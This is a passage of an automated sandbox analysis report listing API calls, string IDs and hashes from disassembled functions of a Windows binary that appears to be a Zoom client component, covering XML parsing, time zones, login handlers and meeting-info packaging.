                • Russia TZ 6 Standard Time, xrefs: 00CA0FA4
                • Russian Standard Time, xrefs: 00CA0F58
                • Kaliningrad Standard Time, xrefs: 00CA0F16
                • North Asia Standard Time, xrefs: 00CA0FDC
                • Novosibirsk Standard Time, xrefs: 00CA116C
                • Coordinated Universal Time, xrefs: 00CA10AC
                • North Asia East Standard Time, xrefs: 00CA101E
                • Cabo Verde Standard Time, xrefs: 00CA10E8
                • @, xrefs: 00CA0E91
                • Std, xrefs: 00CA0E0A
                • UTC, xrefs: 00CA11E8
                • N. Central Asia Standard Time, xrefs: 00CA11A4
                • Russia TZ 2 Standard Time, xrefs: 00CA0F20
                • Vladivostok Standard Time, xrefs: 00CA10A2
                • Yakutsk Standard Time, xrefs: 00CA1060
                • Singapore Standard Time, xrefs: 00CA11E1
                • Cape Verde Standard Time, xrefs: 00CA1120
                • Ekaterinburg Standard Time, xrefs: 00CA0F9A
                • Russia TZ 7 Standard Time, xrefs: 00CA0FE6
                • Russia TZ 1 Standard Time, xrefs: 00CA0EDE
                • Russia TZ 8 Standard Time, xrefs: 00CA1028
                Similarity
                • API ID: Assign@?$CloseCmm@@OpenString$DynamicEnumH_prolog3_InformationTimeZone
                • String ID: @$Cabo Verde Standard Time$Cape Verde Standard Time$Coordinated Universal Time$Ekaterinburg Standard Time$Israel Standard Time$Jerusalem Standard Time$Kaliningrad Standard Time$Malay Peninsula Standard Time$N. Central Asia Standard Time$North Asia East Standard Time$North Asia Standard Time$Novosibirsk Standard Time$Russia TZ 1 Standard Time$Russia TZ 2 Standard Time$Russia TZ 4 Standard Time$Russia TZ 6 Standard Time$Russia TZ 7 Standard Time$Russia TZ 8 Standard Time$Russia TZ 9 Standard Time$Russian Standard Time$SOFTWARE\Microsoft\Windows NT\CurrentVersion\Time Zones$Singapore Standard Time$Std$UTC$Vladivostok Standard Time$Yakutsk Standard Time

                Control-flow Graph
                • Function starting at cb8200 (graph not reproduced; node legend: Executed / Not Executed)
                Similarity
                • API ID: H_prolog3
                • String ID: after_moduleloaded_handler$app_active$app_inactive$app_init_handler$app_login$app_login_handler$auim_loginreturn_handler$broadcast_sync_msg_handler$connect_status_update_handler$dns_connection$im_ready$init_appdata_handler$init_appui_handler$init_mainboard_handler$load_modules_handler$network_disconnect$network_state$ping_primary_domain$pk_primary_proxy_domain$prepare_xmpp_signon_handler$refresh_token$refresh_token_handler$sbpta_loginreturn_handler$sbptwss_loginreturn_handler$sign_and_safe_check$signoff$singup$singup_handler$ssl_connection$tcp_connection$undefined_login$xmpp_signon$xmpp_signon_handler

                Control-flow Graph
                • Function starting at cb85c0 (graph not reproduced; node legend: Executed / Not Executed)
                Similarity
                • API ID: H_prolog3
                • String ID: ab_contact_heartbeat$async_record_heartbeat$autoupdate_heartbeat$chat_image_heartbeat$chat_leftlist_heartbeat$chat_msgcontrol_heartbeat$cmmlib_heartbeat$confinstancemgr_heartbeat$confmgr_heartbeat$dmservice_mgr_heartbeat$emoji_countinfo_heartbeat$http_channel_heartbeat$http_runner_heartbeat$lync_download_heartbeat$mainframe_heartbeat$mesh_network_heartbeat$messenger_heartbeat$mpmeetmgr_heartbeat$msg_thread_heartbeat$notification_heartbeat$outlook_ipc_listen_heartbeat$outlook_ipc_server_heartbeat$ptapp_heartbeat$ptapp_msg_heartbeat$undefined_heartbeat$webservice_heartbeat$xmpp_heartbeat$xmpp_pump_heartbeat

                Control-flow Graph
                • Function starting at cb07a0 (graph not reproduced; node legend: Executed / Not Executed)
                APIs
                • __EH_prolog3.LIBCMT ref: 00CB07A7
                • ?PushDepth@XMLDocument@tinyxml2@@AAEXXZ.RWSNDPQSKZ(00000020), ref: 00CB07B6
                  • Part of subcall function 00CB2A60: ?SetError@XMLDocument@tinyxml2@@AAAXW4XMLError@2@HPBDZZ.RWSNDPQSKZ(?,00000012,?,Element nesting is too deep.), ref: 00CB2A74
                • ?Identify@XMLDocument@tinyxml2@@QAEPADPADPAPAVXMLNode@2@@Z.RWSNDPQSKZ(?,?,00000020), ref: 00CB07EB
                  • Part of subcall function 00CB0240: ?SkipWhiteSpace@XMLUtil@tinyxml2@@SAPBDPBDPAH@Z.RWSNDPQSKZ(?,?), ref: 00CB0255
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(00000000,?,?,00000020), ref: 00CB081F
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ ref: 00CB083F
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ ref: 00CB0858
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ ref: 00CB087B
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ ref: 00CB08A3
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ ref: 00CB08BC
                • ?Value@XMLNode@tinyxml2@@QBEPBDXZ.RWSNDPQSKZ ref: 00CB08EB
                • ?GetStr@StrPair@tinyxml2@@QAEPBDXZ.RWSNDPQSKZ(00000000,7FFFFFFF), ref: 00CB08F9
                • ?StringEqual@XMLUtil@tinyxml2@@SA_NPBD0H@Z.RWSNDPQSKZ(00000000,00000000,7FFFFFFF), ref: 00CB08FF
                • ?InsertEndChild@XMLNode@tinyxml2@@QAEPAV12@PAV12@@Z.RWSNDPQSKZ(?), ref: 00CB0910
                • ?Reset@StrPair@tinyxml2@@QAEXXZ.RWSNDPQSKZ(?), ref: 00CB091B
                • ?Value@XMLNode@tinyxml2@@QBEPBDXZ.RWSNDPQSKZ ref: 00CB092B
                • ?SetError@XMLDocument@tinyxml2@@AAAXW4XMLError@2@HPBDZZ.RWSNDPQSKZ(?,0000000B,?,XMLDeclaration value=%s,00000000), ref: 00CB093E
                • ?DeleteNode@XMLNode@tinyxml2@@CAXPAV12@@Z.RWSNDPQSKZ(?,?,0000000B,?,XMLDeclaration value=%s,00000000), ref: 00CB0946
                • ?Value@XMLNode@tinyxml2@@QBEPBDXZ.RWSNDPQSKZ ref: 00CB0952
                  • Part of subcall function 00CB04A0: ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(?,00000000,00CB0AAA,?,?,?,00CB06F3,?,?,?,00CA56F2,00000000,000000B0,00CA5CDD,?,?), ref: 00CB04AB
                • ?TransferTo@StrPair@tinyxml2@@QAEXPAV12@@Z.RWSNDPQSKZ(00000000), ref: 00CB0970
                  • Part of subcall function 00CAFA10: ?Reset@StrPair@tinyxml2@@QAEXXZ.RWSNDPQSKZ ref: 00CAFA20
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ ref: 00CB0982
                • ?DeleteNode@XMLNode@tinyxml2@@CAXPAV12@@Z.RWSNDPQSKZ(?), ref: 00CB098D
                • ?Reset@StrPair@tinyxml2@@QAEXXZ.RWSNDPQSKZ ref: 00CB0996
                • ?DeleteNode@XMLNode@tinyxml2@@CAXPAV12@@Z.RWSNDPQSKZ(?), ref: 00CB09A3
                • ?SetError@XMLDocument@tinyxml2@@AAAXW4XMLError@2@HPBDZZ.RWSNDPQSKZ(?,0000000F,?,00000000), ref: 00CB09B8
                • ?Reset@StrPair@tinyxml2@@QAEXXZ.RWSNDPQSKZ ref: 00CB09C3
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@State@Unlock@$Node@tinyxml2@@$Pair@tinyxml2@@$Document@tinyxml2@@V12@@$Reset@$DeleteError@Error@2@Node@Value@$Util@tinyxml2@@$Child@Depth@Equal@H_prolog3Identify@InsertNode@2@@PushSkipSpace@Str@StringTransferV12@White
                • String ID: XMLDeclaration value=%s$XMLElement name=%s
                • API String ID: 15653375-38759745
                • Opcode ID: 9f14063b9663b5ce7ec542e3a421d8e378eab44e24a8e7a3b91f03f76d7a4b5a
                • Instruction ID: aadd8fe5a951f42fc237d048664e0c65e08712cba792658b19740a514e881462
                • Opcode Fuzzy Hash: 9f14063b9663b5ce7ec542e3a421d8e378eab44e24a8e7a3b91f03f76d7a4b5a
                • Instruction Fuzzy Hash: 46611974E0021A9FDB15DF64C8919EFB7B5BF48300F244459E826A73A2DB30EE41DBA0

                Similarity
                • API ID: H_prolog3
                • String ID: base_window_create_handler$click_redbadge_action$expand_reply_action$get_thread_data$get_thread_data_handler$init_sessionlist_handler$leftbar_selection_handler$notify_handler$open_bookmark_action$open_bookmark_handler$open_mention_action$open_mention_handler$open_session_action$open_session_handler$send_message_action$session_list_update_handler$sort_leftbar_handler$topbar_resize_handler$undefined_platform$update_unread_handler$webview_js_action$webview_navigate_action$webview_recv_message_handler$zapp_init_handler
                • API String ID: 431132790-3937024713
                • Opcode ID: eabadb8a185a2228730bc19e7c3853aedacdc9027161811e4757a7c319acef3c
                • Instruction ID: 6f9c96af5e82091b9426daf3b2e84e1b8886393849da304eee8b565712e43970
                • Opcode Fuzzy Hash: eabadb8a185a2228730bc19e7c3853aedacdc9027161811e4757a7c319acef3c
                • Instruction Fuzzy Hash: 3A11CB60398346EF8E504A167C0A9E471AA7E04B00FA05D3774466A1C0EEE2C55CFE6A

                APIs
                • __EH_prolog3_GS.LIBCMT ref: 00C88357
                • ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000044,00C69A71), ref: 00C8836B
                  • Part of subcall function 00C5DC01: __EH_prolog3.LIBCMT ref: 00C5DC08
                • ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.zoom.app.confirmConfLeave,00000044,00C69A71), ref: 00C8839D
                • ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,-00000004,com.zoom.app.confirmConfLeave,00000044,00C69A71), ref: 00C883DA
                • ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.zoom.app.confirmConfLeave,?,-00000004,com.zoom.app.confirmConfLeave,00000044,00C69A71), ref: 00C8840C
                  • Part of subcall function 00C5DF63: __EH_prolog3_GS.LIBCMT ref: 00C5DF6A
                  • Part of subcall function 00C5DF63: ??0CCmmArchiveTreeNode@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000040,00C5DB2C), ref: 00C5DF80
                  • Part of subcall function 00C5DF63: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,00000040,00C5DB2C), ref: 00C5DFA7
                  • Part of subcall function 00C5DF63: ?SetUInt64@CCmmArchiveVarivant@Cmm@@QAEX_K@Z.RWSNDPQSKZ(00000000,00000000,-00000004,-00000004,?,00000040,00C5DB2C), ref: 00C5DFEE
                  • Part of subcall function 00C5DF63: ?AppendChild@CCmmArchiveTreeNode@Archive@Cmm@@QAEHPAV123@@Z.RWSNDPQSKZ(00000000,00000000,00000000,-00000004,-00000004,?,00000040,00C5DB2C), ref: 00C5DFF6
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(00000001,?,-00000004,com.zoom.app.confirmConfLeave,00000044,00C69A71), ref: 00C88596
                  • Part of subcall function 00C9B84F: __EH_prolog3_GS.LIBCMT ref: 00C9B856
                  • Part of subcall function 00C9B84F: ??0CCmmArchiveTreeNode@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000040,00C857CC), ref: 00C9B86C
                  • Part of subcall function 00C9B84F: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,00000040,00C857CC), ref: 00C9B893
                  • Part of subcall function 00C9B84F: ?SetInt32@CCmmArchiveVarivant@Cmm@@QAEXH@Z.RWSNDPQSKZ(00000000,-00000004,-00000004,?,00000040,00C857CC), ref: 00C9B8D9
                  • Part of subcall function 00C9B84F: ?AppendChild@CCmmArchiveTreeNode@Archive@Cmm@@QAEHPAV123@@Z.RWSNDPQSKZ(00000000,00000000,-00000004,-00000004,?,00000040,00C857CC), ref: 00C9B8E1
                  • Part of subcall function 00C5DEC4: __EH_prolog3_GS.LIBCMT ref: 00C5DECB
                  • Part of subcall function 00C5DEC4: ??0CCmmArchiveTreeNode@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000040,00C5D7F6,?,?,?,?,-00000004,?,?,-00000004,?,0000004C,00C5C7F7,com.zoom.app.mapi.outlookmapi.eventchange.notify,NotifyType,EventID), ref: 00C5DEE1
                  • Part of subcall function 00C5DEC4: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,00000040,00C5D7F6,?,?,?,?,-00000004,?,?,-00000004,?,0000004C,00C5C7F7,com.zoom.app.mapi.outlookmapi.eventchange.notify), ref: 00C5DF08
                  • Part of subcall function 00C5DEC4: ?SetUInt32@CCmmArchiveVarivant@Cmm@@QAEXI@Z.RWSNDPQSKZ(00000000,?,-00000004,?,00000040,00C5D7F6,?,?,?,?,-00000004,?,?,-00000004,?,0000004C), ref: 00C5DF4E
                  • Part of subcall function 00C5DEC4: ?AppendChild@CCmmArchiveTreeNode@Archive@Cmm@@QAEHPAV123@@Z.RWSNDPQSKZ(00000000,00000000,?,-00000004,?,00000040,00C5D7F6,?,?,?,?,-00000004,?,?,-00000004,?), ref: 00C5DF56
                • EnterCriticalSection.KERNEL32(?,?,-00000004,com.zoom.app.confirmConfLeave,?,-00000004,com.zoom.app.confirmConfLeave), ref: 00C88566
                • LeaveCriticalSection.KERNEL32(?,?,?,-00000004,com.zoom.app.confirmConfLeave,?,-00000004,com.zoom.app.confirmConfLeave), ref: 00C88583
                Similarity
                • API ID: Cmm@@$Archive$Archive@$Tree$Node@$??0?$String$H_prolog3_$AppendChild@V123@@Varivant@$CriticalInt32@PackageSectionTree@$EnterH_prolog3Int64@LeaveNode@23@Root@State@Unlock@
                • String ID: ArchivingOption$ErrCode$FreeMeetingElapsedTime$InMeetingFlag$IsBasicPlusMeeting$IsHost$IsMeetingShowExtendDialog$JMFLog$Leave$LiveSteamViewUrl$Reason$com.zoom.app.confirmConfLeave$leaveReason$subConfType$subHasError$subSdkError
                • API String ID: 3495133802-1651624624
                • Opcode ID: 47ab1486bc16ce88342fd3ab4479879b6a7b6fbc65e6e2490084f9002c9c9993
                • Instruction ID: b5e8b2c8ff8615b9e71f6c076d07a262143ea34407a883eab516a0ca2e807036
                • Opcode Fuzzy Hash: 47ab1486bc16ce88342fd3ab4479879b6a7b6fbc65e6e2490084f9002c9c9993
                • Instruction Fuzzy Hash: B751E230B006158BDF24FB6099152AEB2B5AF44305F884129EC12AB7C9DF34DF4AD7AD

                APIs
                • __EH_prolog3_GS.LIBCMT ref: 00C88A84
                • ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000044,00C69F92), ref: 00C88A98
                  • Part of subcall function 00C5DC01: __EH_prolog3.LIBCMT ref: 00C5DC08
                • ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.zoom.app.notifyPTLoginInfo,00000044,00C69F92), ref: 00C88ACA
                • ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,-00000004,com.zoom.app.notifyPTLoginInfo,00000044,00C69F92), ref: 00C88B07
                • ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.zoom.app.notifyPTLoginInfo,?,-00000004,com.zoom.app.notifyPTLoginInfo,00000044,00C69F92), ref: 00C88B39
                  • Part of subcall function 00C5DE1B: __EH_prolog3_GS.LIBCMT ref: 00C5DE22
                  • Part of subcall function 00C5DE1B: ??0CCmmArchiveTreeNode@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000040,00C5D804,?,?,?,?,-00000004,?,?,-00000004,?,0000004C,00C5C7F7,com.zoom.app.mapi.outlookmapi.eventchange.notify,NotifyType,EventID), ref: 00C5DE38
                  • Part of subcall function 00C5DE1B: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,00000040,00C5D804,?,?,?,?,-00000004,?,?,-00000004,?,0000004C,00C5C7F7,com.zoom.app.mapi.outlookmapi.eventchange.notify), ref: 00C5DE5F
                  • Part of subcall function 00C5DE1B: ?ClearData@CCmmArchiveVarivant@Cmm@@IAEXXZ.RWSNDPQSKZ(?,-00000004,?,00000040,00C5D804,?,?,?,?,-00000004,?,?,-00000004,?,0000004C,00C5C7F7), ref: 00C5DEA3
                  • Part of subcall function 00C5DE1B: ?AppendChild@CCmmArchiveTreeNode@Archive@Cmm@@QAEHPAV123@@Z.RWSNDPQSKZ(00000000,?,-00000004,?,00000040,00C5D804,?,?,?,?,-00000004,?,?,-00000004,?,0000004C), ref: 00C5DEB6
                • EnterCriticalSection.KERNEL32(?,?,-00000004,com.zoom.app.notifyPTLoginInfo,?,-00000004,com.zoom.app.notifyPTLoginInfo), ref: 00C88C93
                • LeaveCriticalSection.KERNEL32(?,?,?,-00000004,com.zoom.app.notifyPTLoginInfo,?,-00000004,com.zoom.app.notifyPTLoginInfo), ref: 00C88CB0
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(00000001,?,-00000004,com.zoom.app.notifyPTLoginInfo,00000044,00C69F92), ref: 00C88CC3
                Similarity
                • API ID: Cmm@@$Archive$Archive@$??0?$StringTree$CriticalH_prolog3_Node@PackageSectionTree@$AppendChild@ClearData@EnterH_prolog3LeaveNode@23@Root@State@Unlock@V123@@Varivant@
                • String ID: B64PBUserProfile$B64PZRUserProfile$ClientCred$ClientCredExpireTime$ClientNwsCred$HasZoomIM$UpdateType$com.zoom.app.notifyPTLoginInfo$meetingToken$nwsDomain$profileCardUrl$pzrCred$whiteboardUrlRegular$workflowUrlRegualr$workvivoDomain$zoomDocsUrlRegular
                • API String ID: 2816594900-2215852526
                • Opcode ID: 598a77a74bdde14ad77c50009c2ecb667cd5b54b62f7edacfbfa5f98b4b939ca
                • Instruction ID: 76022606d463eb5601610fa95c210e673f3932bf2625b0399e70ab6ae6a233e6
                • Opcode Fuzzy Hash: 598a77a74bdde14ad77c50009c2ecb667cd5b54b62f7edacfbfa5f98b4b939ca
                • Instruction Fuzzy Hash: E351CF34B01B009BCF24FBA099462AE76659F81709F444028EC13AB789DF70CE4AD7BD

                APIs
                • ?Compare@?$CStringT@D@Cmm@@QBEHPBD@Z.RWSNDPQSKZ(Text,?,00000000,00000001,00CB446D,count,dataType,?,isEssential,isContainer,?,-00000004,00D334D8,name,?,00000084), ref: 00CB41CD
                • ?ClearData@CCmmArchiveVarivant@Cmm@@IAEXXZ.RWSNDPQSKZ(Text,?,00000000,00000001,00CB446D,count,dataType,?,isEssential,isContainer,?,-00000004,00D334D8,name,?,00000084), ref: 00CB41DF
                  • Part of subcall function 00CA9B90: ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(00000038,?,00000001,00CA99FB,00000000,?,00C5DF53,00000000,?,-00000004,?,00000040,00C5D7F6), ref: 00CA9BC2
                • ?Compare@?$CStringT@D@Cmm@@QBEHPBD@Z.RWSNDPQSKZ(String,Text,?,00000000,00000001,00CB446D,count,dataType,?,isEssential,isContainer,?,-00000004,00D334D8,name,?), ref: 00CB41F3
                • ?Compare@?$CStringT@D@Cmm@@QBEHPBD@Z.RWSNDPQSKZ(Int32,String,Text,?,00000000,00000001,00CB446D,count,dataType,?,isEssential,isContainer,?,-00000004,00D334D8,name), ref: 00CB4212
                • ?SetInt32@CCmmArchiveVarivant@Cmm@@QAEXH@Z.RWSNDPQSKZ(00000000,Int32,String,Text,?,00000000,00000001,00CB446D,count,dataType,?,isEssential,isContainer,?,-00000004,00D334D8), ref: 00CB421E
                Similarity
                • API ID: Cmm@@$Compare@?$String$ArchiveVarivant@$ClearData@Int32@State@Unlock@
                • String ID: BOOL$Char$Double$Float$Int32$String$Text$UInt32
                • API String ID: 3594211462-4079823965
                • Opcode ID: 318f9f5bccfb6d3280ba99b46cf486a28ec61d0612a94f7b9d49d45a3687b960
                • Instruction ID: d3b7a25abf1cbe20d58f69d6cb3ea6026493e225e86d9c5a50229f920e15614a
                • Opcode Fuzzy Hash: 318f9f5bccfb6d3280ba99b46cf486a28ec61d0612a94f7b9d49d45a3687b960
                • Instruction Fuzzy Hash: AC21F8203087125BDB1C2B665CB62BE728B6FD1705F90001DFA0687187FF74AD95B667

                APIs
                • __EH_prolog3_GS.LIBCMT ref: 00CA8BAA
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(00000090,00CA8B91,?,?,00CA58CD,?,?), ref: 00CA8BD7
                  • Part of subcall function 00C6537E: __EH_prolog3.LIBCMT ref: 00C65385
                • ??0?$CStringT@D@Cmm@@QAE@PBD@Z.RWSNDPQSKZ(-00000004,00000000,?,00CA58CD,?,?), ref: 00CA8BFD
                • ?FindAttribute@XMLElement@tinyxml2@@QBEPBVXMLAttribute@2@PBD@Z.RWSNDPQSKZ(00000001,00000000,?,00CA58CD,?,?), ref: 00CA8C47
                • ?QueryIntValue@XMLAttribute@tinyxml2@@QBE?AW4XMLError@2@PAH@Z.RWSNDPQSKZ(00000000,00000001,00000000,?,00CA58CD,?,?), ref: 00CA8C5D
                  • Part of subcall function 00CB0FC0: ?GetStr@StrPair@tinyxml2@@QAEPBDXZ.RWSNDPQSKZ(?,00CA8C62,00000000,00000001,00000000,?,00CA58CD,?,?), ref: 00CB0FC6
                  • Part of subcall function 00CB0FC0: ?ToInt@XMLUtil@tinyxml2@@SA_NPBDPAH@Z.RWSNDPQSKZ(00000000,?,?,00CA8C62,00000000,00000001,00000000,?,00CA58CD,?,?), ref: 00CB0FCF
                • ?SetInt32@CCmmArchiveVarivant@Cmm@@QAEXH@Z.RWSNDPQSKZ(00000000,00000000,00000001,00000000,?,00CA58CD,?,?), ref: 00CA8C72
                  • Part of subcall function 00CA99D0: ?ClearData@CCmmArchiveVarivant@Cmm@@IAEXXZ.RWSNDPQSKZ(?,?,00CA8C77,00000000,00000000,00000001,00000000,?,00CA58CD,?,?), ref: 00CA99D6
                • API ID: Cmm@@$ArchiveVarivant@$??0?$Attribute@Attribute@2@Attribute@tinyxml2@@ClearData@Element@tinyxml2@@Error@2@FindH_prolog3H_prolog3_Int32@Int@Pair@tinyxml2@@QueryState@Str@StringUnlock@Util@tinyxml2@@Value@
                • String ID:
                • API String ID: 4248426584-0
                • Opcode ID: 3c3454ecc864d6a21adcad5c175f525bbbd38b85474cb45b7ef8e268c760024c
                • Instruction ID: a0e284109e0108137f6b29c4566fbd3fa8d03c49ea527dd245493b744936724f
                • Opcode Fuzzy Hash: 3c3454ecc864d6a21adcad5c175f525bbbd38b85474cb45b7ef8e268c760024c
                • Instruction Fuzzy Hash: 92C15B71E0121ADFDF14DBA9C855BEEBBF5AF19308F504099E509A3241EB309A88DF61
                APIs
                • SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000), ref: 00CDA0F1
                • GetPrivateProfileStringW.KERNEL32(ZoomChat,com.zoom.test.disable_crash_handler,00000000,?,00000008,?), ref: 00CDA15E
                • SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000), ref: 00CDA194
                • PathAppendW.SHLWAPI(?,Zoom), ref: 00CDA1AB
                • PathAppendW.SHLWAPI(?,logs), ref: 00CDA1BE
                • GetCurrentProcessId.KERNEL32 ref: 00CDA1C9
                • OpenProcess.KERNEL32(001FFFFF,00000000,00000000), ref: 00CDA1DC
                • GetLastError.KERNEL32 ref: 00CDA1EA
                • ImpersonateLoggedOnUser.ADVAPI32(00000000), ref: 00CDA215
                • GetLastError.KERNEL32 ref: 00CDA221
                • CloseHandle.KERNEL32(?), ref: 00CDA22B
                • CreateDirectoryW.KERNEL32(?,00000000), ref: 00CDA23F
                • GetTempFileNameW.KERNEL32(?,zoomtest,00000000,?), ref: 00CDA273
                • DeleteFileW.KERNEL32(?), ref: 00CDA285
                • RevertToSelf.ADVAPI32 ref: 00CDA290
                • CloseHandle.KERNEL32(00000000), ref: 00CDA29B
                Strings
                Similarity
                • API ID: Path$AppendCloseErrorFileFolderHandleLastProcessSpecial$CreateCurrentDeleteDirectoryImpersonateLoggedNameOpenPrivateProfileRevertSelfStringTempUser
                • String ID: Zoom$ZoomChat$\Zoom\data\Zoom.us.ini$com.zoom.test.disable_crash_handler$logs$yes$zoomtest
                • API String ID: 3017824836-3271044474
                • Opcode ID: ed16077e297b3354e9379e77b1f9286c7dc501161fb859362ed9e746a57f3898
                • Instruction ID: 0ce0b2e18f9d074e32cf54219aabcf523bfd5dff04d786cb7b70dd150620d94c
                • Opcode Fuzzy Hash: ed16077e297b3354e9379e77b1f9286c7dc501161fb859362ed9e746a57f3898
                • Instruction Fuzzy Hash: C6618F71644345ABE720DB60DC49B9FB7E9AF84701F00891EF698D7290EB70D549CBA3
                APIs
                • __EH_prolog3_GS.LIBCMT ref: 00CB42E0
                • ??0CCmmArchiveTreeNode@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000084,00CB4191,Node,?,-00000004,00D334D8,?,-00000004,00D334D8,version), ref: 00CB42FF
                • ?QueryStringAttribute@XMLElement@tinyxml2@@QBE?AW4XMLError@2@PBDPAV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@Z.RWSNDPQSKZ(name,?,00000084,00CB4191,Node,?,-00000004,00D334D8,?,-00000004,00D334D8,version), ref: 00CB4335
                  • Part of subcall function 00CA4870: ?Attribute@XMLElement@tinyxml2@@QBEPBDPBD0@Z.RWSNDPQSKZ(?,00000000,?), ref: 00CA488A
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(00000001,name,?,00000084,00CB4191,Node,?,-00000004,00D334D8,?,-00000004,00D334D8,version), ref: 00CB4346
                • ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,00D334D8,name,?,00000084,00CB4191,Node,?,-00000004,00D334D8,?,-00000004,00D334D8,version), ref: 00CB4374
                • ??0?$CStringT@D@Cmm@@QAE@PBD@Z.RWSNDPQSKZ(String,?,-00000004,00D334D8,name,?,00000084,00CB4191,Node,?,-00000004,00D334D8,?,-00000004,00D334D8,version), ref: 00CB43C1
                • ?FindAttribute@XMLElement@tinyxml2@@QBEPBVXMLAttribute@2@PBD@Z.RWSNDPQSKZ(isContainer,?,-00000004,00D334D8,name,?,00000084,00CB4191,Node,?,-00000004,00D334D8,?,-00000004,00D334D8,version), ref: 00CB43D7
                • ?QueryIntValue@XMLAttribute@tinyxml2@@QBE?AW4XMLError@2@PAH@Z.RWSNDPQSKZ(?,isContainer,?,-00000004,00D334D8,name,?,00000084,00CB4191,Node,?,-00000004,00D334D8,?,-00000004,00D334D8), ref: 00CB43E9
                • ?FindAttribute@XMLElement@tinyxml2@@QBEPBVXMLAttribute@2@PBD@Z.RWSNDPQSKZ(isEssential,isContainer,?,-00000004,00D334D8,name,?,00000084,00CB4191,Node,?,-00000004,00D334D8,?,-00000004,00D334D8), ref: 00CB43F5
                • ?QueryIntValue@XMLAttribute@tinyxml2@@QBE?AW4XMLError@2@PAH@Z.RWSNDPQSKZ(?,isEssential,isContainer,?,-00000004,00D334D8,name,?,00000084,00CB4191,Node,?,-00000004,00D334D8,?,-00000004), ref: 00CB4407
                • ?QueryStringAttribute@XMLElement@tinyxml2@@QBE?AW4XMLError@2@PBDPAV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@Z.RWSNDPQSKZ(dataType,?,isEssential,isContainer,?,-00000004,00D334D8,name,?,00000084,00CB4191,Node,?,-00000004,00D334D8,?), ref: 00CB4417
                • ?FindAttribute@XMLElement@tinyxml2@@QBEPBVXMLAttribute@2@PBD@Z.RWSNDPQSKZ(count,dataType,?,isEssential,isContainer,?,-00000004,00D334D8,name,?,00000084,00CB4191,Node,?,-00000004,00D334D8), ref: 00CB4423
                • ?QueryIntValue@XMLAttribute@tinyxml2@@QBE?AW4XMLError@2@PAH@Z.RWSNDPQSKZ(?,count,dataType,?,isEssential,isContainer,?,-00000004,00D334D8,name,?,00000084,00CB4191,Node,?,-00000004), ref: 00CB4435
                Strings
                Similarity
                • API ID: Attribute@Element@tinyxml2@@$Error@2@Query$Cmm@@String$Attribute@2@Attribute@tinyxml2@@FindValue@$??0?$D@2@@std@@@D@std@@U?$char_traits@V?$allocator@V?$basic_string@$ArchiveArchive@H_prolog3_Node@State@TreeUnlock@
                • String ID: Node$String$count$dataType$isContainer$isEssential$name
                • API String ID: 2387648311-1746253375
                • Opcode ID: bff3e51f7da313bec1b3f2aacebe36d4d97f5260106b97d4c3cfc22cc4c24d3f
                • Instruction ID: 7e453db374a247094e38cf0a45ecad3a2a8ec9b07fb7d3f5e717878817ad5891
